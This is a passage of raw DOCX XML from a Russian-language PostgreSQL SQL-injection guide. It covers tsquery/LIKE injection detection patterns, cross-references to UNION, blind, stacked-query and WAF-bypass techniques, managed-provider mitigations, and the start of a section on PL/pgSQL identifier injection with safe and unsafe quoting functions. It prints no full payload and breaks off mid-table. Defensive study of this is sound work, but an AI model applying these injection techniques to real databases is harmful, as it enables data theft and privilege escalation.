    <w:p w14:paraId="04956005" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Высокий confidence — if `to_tsquery(` найдено в коде, проверить наличие миграции на</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71915264" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># websearch_to_tsquery или подтверждение server-side-built первого аргумента</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F12B778" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PATTERN_INJECTION_RISK = 6   # medium-high — leak без RCE, но direct extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C155B39" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Эти patterns ловят statically-detectable варианты на code-review. Runtime-signal через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + анализ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>syntax error in tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> patterns для production-детекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A597173" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74621726" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 UNION-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — LIKE-bypass (3.15.1) может комбинироваться с UNION через дополнительные точки входа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721F0CDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Error-based via CAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.15.4 — параллельный класс error-каналов; tsquery error message — конкретный source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3D17BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Boolean-based blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.15.1 (position-matching) и 3.15.2 (boolean override) создают boolean-каналы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC4499C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 Time-based blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.15.1 (DoS-DDoS) может перейти в time-channel при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в subquery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B48B600" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — концепция 3.15.4 эскалирует в stacked, если concat выходит из tsquery-arg в SQL-body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7AC6AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9 Обход фильтров</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — LIKE и tsquery operators обычно проходят WAF, который смотрит на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>/keywords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2425199E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 Identifier injection в plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельный класс semantic-injection на серверной стороне.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54878F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Параметризованные запросы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общая защита; 3.15 показывает её </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ограничения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (bind не закрывает pattern-семантику).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE14587" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 Конфиги PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обнаруживает 3.15.4 leakage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3517F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 Дополнительные приёмы валидации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — escape-helpers (3.15.1), Literal/whitelist (3.15.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE478D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры (RDS, Cloud SQL, Supabase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FC35A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Все четыре подраздела 3.15 — application-level или ввод-зависимые, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без specific provider behavior</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A3434C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS RDS / Aurora PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: одинаковое поведение со self-hosted. Для 3.15.1 DoS-mitigation — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через parameter group; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_trgm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> extension доступен. Для FTS — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> идентичны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1659AF93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Cloud SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: то же; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через flag, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_trgm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B162A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Supabase</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PostgREST умеет фильтровать через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operator (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?title=fts.admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); если приложение использует PostgREST RPC, тот </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>уже передаёт user-input в `to_tsquery`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — наследует уязвимость 3.15.2/3.15.4. Recommendation: использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PostgREST с phrase-mode (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?title=phfts.term</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), что соответствует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phraseto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7521BE95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Database for PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>: то же поведение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A996340" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Provider-mitigation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ограничен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для DoS защиты 3.15.1. Логирование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>syntax error in tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступно в Cloud SQL Logs / RDS Performance Insights и может использоваться для runtime-детекции 3.15.4. Принципиальной защиты на уровне provider — нет, всё application-level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5981514F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.16.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51193357" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identifier injection в plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — класс уязвимостей, специфичный для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>серверного кода на PL/pgSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (functions, procedures, triggers), где dynamic SQL строится через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с конкатенацией identifier-имён (таблиц, колонок, схем). PostgreSQL Wire Protocol bind-параметры </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не работают для identifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. 3.14.2 application-side analog) — единственный путь подставить имя таблицы или колонки в dynamic SQL это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>текстовая подстановка</w:t>
      </w:r>
      <w:r>
        <w:t>. Какой инструмент использовать — определяет, есть ли уязвимость:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED3832C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`format('%I', ident)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — identifier quoting с doubling двойных кавычек. Безопасно для имён.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235BFE69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`quote_ident(ident)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функциональный эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t>; стилистически старее.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3BCA4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`format('%L', value)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`quote_literal(value)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для значений в text-form (когда EXECUTE USING нельзя).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCCC2BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`EXECUTE ... USING $1`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — bind-параметризация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>для значений</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через extended protocol. Не работает для identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D57B389" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`format('%s', x)` или `||`-concat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>антипаттерны</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, всегда уязвимы, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не валидирован.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388F77AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.16 — это серверный mirror application-side identifier injection (3.14.2). В отличие от application-кода, plpgsql работает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>внутри PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и часто </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>в SECURITY DEFINER контексте</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для делегирования прав) — payload получает права owner-а функции, что в худшем случае означает superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEC059" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Mini-таблица: пять подразделов 3.16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9479F" w14:paraId="058C5A7D"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C55FF62"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A331F8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Конструкция</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64E52F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Назначение</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5D1B966" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Антипаттерн</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9C27EEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Защита</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="05B44B56"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7821B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.16.1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B214B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>format('%s' / '%I', x)</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D182FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>identifier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9A8A22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>%s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> для имени таблицы/колонки</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B227F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>%I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2E7707D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BAC77B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.16.2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839E16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>quote_ident(x)</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549B1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
